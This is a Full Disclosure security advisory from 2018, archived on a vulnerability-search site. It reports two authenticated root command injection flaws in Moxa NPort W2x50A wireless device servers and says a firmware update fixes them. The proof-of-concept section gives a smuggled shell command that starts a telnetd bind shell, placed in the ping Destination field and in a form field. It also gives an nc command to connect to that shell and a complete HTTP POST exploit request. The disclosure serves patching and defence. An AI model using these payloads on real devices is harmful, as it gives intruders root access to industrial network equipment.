Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Multiple OS Command Injection in Moxa NPort W2x50A products

Related Vulnerabilities: CVE-2018-19659   CVE-2017-12120   CVE-2018-19660  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="63"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#64">By Date</a>
<a href="65"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="63"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#64">By Thread</a>
<a href="65"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Multiple OS Command Injection in Moxa NPort W2x50A products</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Maxim Khazov via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Thu, 29 Nov 2018 10:57:22 +0300


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">
Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS 
Command Injection vulnerabilities:

#1 Authenticated OS Command Injection in web server ping functionality

Reserverd CVE ID: CVE-2018-19659

A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root 
user. Exploitation required authentication. This is similar to CVE-2017-12120.

Proof-of-concept: 
1. Authenticate to Moxa NPort W2x50A device.
2. Go to Main menu&nbsp;→ System Management&nbsp;→ Maintenance&nbsp;→ Ping → Destination
3. Enter &nbsp;;telnetd -l/bin/sh -p4444&amp;;. in 'Destination' field
4. Connect to opened bind shell:&nbsp;nc $IP_ADDRESS 4444

 #2 Authenticated OS Command Injection in web server wlan profile properties functionality

Reserverd CVE ID: CVE-2018-19660
&nbsp;
A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the 
root user. Exploitation required authentication. 

Proof-of-concept (sample HTTP request opening bind shell on port 4444):

POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1
Host: {IP:PORT}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SessionID={YOURSESSIONID}
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 309
&nbsp;
Authentication=3&amp;EAP_method=1&amp;Username= ;telnetd -l/bin/sh -p4444&amp;;

These vulnerabilities were fixed in the firmware version 2.2 Build_18082311.
<a rel="nofollow" href="https://www.moxa.com/support/download.aspx?type=support&amp;id=14781&nbsp;">https://www.moxa.com/support/download.aspx?type=support&amp;id=14781&nbsp;</a>


Best regards,
Maksim Khazov

_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="63"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#64">By Date</a>
<a href="65"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="63"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#64">By Thread</a>
<a href="65"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Multiple OS Command Injection in Moxa NPort W2x50A products</strong> <em>Maxim Khazov via Fulldisclosure (Nov 30)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started